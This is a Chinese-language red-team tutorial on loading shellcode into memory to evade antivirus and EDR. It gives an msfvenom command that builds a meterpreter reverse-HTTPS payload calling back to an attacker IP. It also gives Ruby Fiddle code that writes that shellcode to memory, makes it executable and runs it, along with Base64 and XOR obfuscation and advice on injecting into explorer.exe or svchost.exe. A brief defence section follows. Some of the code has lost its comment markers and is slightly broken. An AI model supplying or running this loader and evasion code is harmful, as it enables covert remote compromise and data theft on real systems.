一、内存加载免杀背后的魔法
很多防护工具,比如杀毒软件和EDR,都会对磁盘上的二进制文件进行严格的扫描和分析。一旦检测到某些恶意代码,就会立刻进行拦截。然而,事情总有漏洞。大多数防护工具对内存中的活动监控并没有那么全面,尤其是当我们的恶意代码从未以文件形式落地时,传统的静态签名和文件哈希扫描就完全失效了。这就是内存加载免杀技术的核心思想:通过直接将恶意代码加载到内存中而绕过磁盘扫描。
在这部分,我们将拆解内存加载免杀的原理并分析其背后的技术逻辑。
为什么内存加载更难检测?
为了理解这一点,我们需要从杀毒软件和EDR的运行机制开始。传统的静态扫描更倾向于基于文件特征匹配,比如:
- 文件哈希值比对(静态文件签名)。
- 文件内容的模式匹配(特定特征字符串)。
- 文件 PE 结构分析。
而内存加载的恶意代码则完全避开了这些静态扫描技术:
- 文件不落地:攻击者直接将代码加载到内存中运行,无需在磁盘上保存任何恶意文件。
- 动态解密或混淆:恶意代码在运行时解密,直接以纯净的形式进入内存。
- 无固定特征:内存中的代码可以在执行过程中不断变化,这让基于特征的检测更加困难。
在技术层面,内存加载免杀通常利用了以下两种思路:
- 代码注入:将恶意代码注入到合法进程的内存地址空间中运行。
- 动态加载:使用操作系统提供的动态加载机制(如 Windows 的
VirtualAlloc和CreateThread)将代码直接加载到内存中执行。
接下来,我们将基于 Ruby 和 Shell 编写一个完整的内存加载免杀脚本,看看如何实现这种强大的技术。
---
二、环境搭建与基础工具准备
为了让大家能够复现这次实验,首先需要搭建一个测试环境。我们需要一个靶机和一个攻击机,靶机的操作系统可以是 Windows 10(安装最新版 Windows Defender 或其他 EDR 工具),攻击机可以是 Kali Linux 或 Parrot OS。
实验环境配置
- 靶机(Windows 10)
- 安装 Windows Defender 并保持开启状态。
- 安装一款主流的 EDR,比如 CrowdStrike 或 Carbon Black(可选)。
- 攻击机(Kali Linux/Parrot OS)
- 确保安装了 Ruby 和 msfvenom 工具。
- 下载并配置 Metasploit Framework 和 Cobalt Strike(如果有权限)。
- 工具链
msfvenom:用于生成 payload。- Ruby:实现动态内存加载逻辑。
- Shell:辅助完成原生反射加载。
---
三、Payload 构造的艺术
我们将在这一部分通过 msfvenom 构造一个极简的恶意 payload,并结合 Ruby 完成内存加载。
使用 msfvenom 生成 shellcode
在攻击机上运行以下命令,生成一个简单的 Windows 反向 shell shellcode:
<pre><code class="language-bash">msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.100 LPORT=443 -f raw -o shellcode.bin</code></pre>
解释一下这个命令:
-p指定 payload 类型为 meterpreter 反向 HTTPS。LHOST是你的攻击机 IP 地址。LPORT是攻击机监听的端口。-f raw生成原始格式的 shellcode。-o shellcode.bin将输出保存为二进制文件。
生成的 shellcode.bin 是我们的恶意代码,但目前它还是很容易被检测到。我们接下来会对它进行内存加载操作。
Ruby 内存加载代码
以下是一个使用 Ruby 实现内存加载的例子:
<pre><code class="language-ruby">require 'fiddle' require 'base64'
读取 shellcode
shellcode = File.read('shellcode.bin')
在内存中分配空间
memory = Fiddle::Pointer.malloc(shellcode.size)
将 shellcode 写入分配的内存
memory[0, shellcode.size] = shellcode
设置内存页面为可执行
Fiddle::Function.new( Fiddle::Handle::DEFAULT['VirtualProtect'], [Fiddle::TYPE_VOIDP, Fiddle::TYPE_SIZE_T, Fiddle::TYPE_LONG, Fiddle::TYPE_VOIDP], Fiddle::TYPE_INT ).call(memory.to_i, shellcode.size, 0x40, Fiddle::Pointer.malloc(4))
开始执行 shellcode
Fiddle::Function.new(memory.to_i, [], Fiddle::TYPE_VOIDP).call</code></pre>
代码解读:
- 加载
shellcode.bin文件,将 shellcode 读取到内存中。 - 调用 Windows API
VirtualProtect,将分配的内存页面标记为可执行。 - 使用
Fiddle::Function创建指向 shellcode 的函数指针,并通过指针直接调用 shellcode。
---
四、绕过检测的绝技
如果直接运行上面的代码,可能会被部分杀软检测到。这是因为 shellcode 中某些部分的特征可能已经被标记为恶意。为了进一步提升免杀成功率,我们可以采取以下对抗措施:
混淆与加密
- Base64 加密
- 使用 Base64 对 shellcode 进行编码,并在运行时解码。
<pre><code class="language-ruby">encrypted_shellcode = Base64.strict_encode64(shellcode)
解码并加载
decoded_shellcode = Base64.decode64(encrypted_shellcode) memory[0, decoded_shellcode.size] = decoded_shellcode</code></pre>
- 自定义加密
- 使用 XOR 或其他加密方法对 shellcode 加密。以下是一个简单的 XOR 实现:
<pre><code class="language-ruby">key = 'my_secret_key' encrypted = shellcode.bytes.map.with_index { |b, i| b ^ key[i % key.size].ord }</code></pre>
使用合法进程作为宿主
将 shellcode 注入到合法进程(如 explorer.exe 或 svchost.exe)中,可以进一步提升隐匿性。这可以通过 Windows API OpenProcess 和 WriteProcessMemory 来实现。
---
五、如何检测与防御?
虽然内存加载免杀技术非常强大,但也不是无法防御。以下是一些可能的防护措施:
- 基于行为的检测
- 监控进程是否调用了可疑的内存操作(如
VirtualAlloc或VirtualProtect)。 - 检测内存中的代码是否具有可疑特征。
- 启用高级 EDR
- 使用支持内存和行为分析的高级 EDR 工具(如 CrowdStrike 或 SentinelOne)。
- 定期内存扫描
- 定期扫描内存中的可执行代码,并与基准特征库进行对比。
---
六、实战经验总结
在实际操作中,内存加载免杀非常适合用于目标攻击的后期阶段,比如权限维持和数据窃取。以下是一些关键心得:
- 工具链选择至关重要:不同的目标防护措施不同,选择合适的免杀工具和技术尤为重要。
- 动态版本更新:防护工具的签名库会不断更新,因此免杀代码也要经常调整。
- 测试环境不可或缺:在开发免杀代码时,一定要在虚拟环境中反复测试,以确保最终代码稳定可靠。
内存加载免杀是一门艺术,而非简单的工具使用。希望这篇文章能为你的红队技术栈提供新的灵感。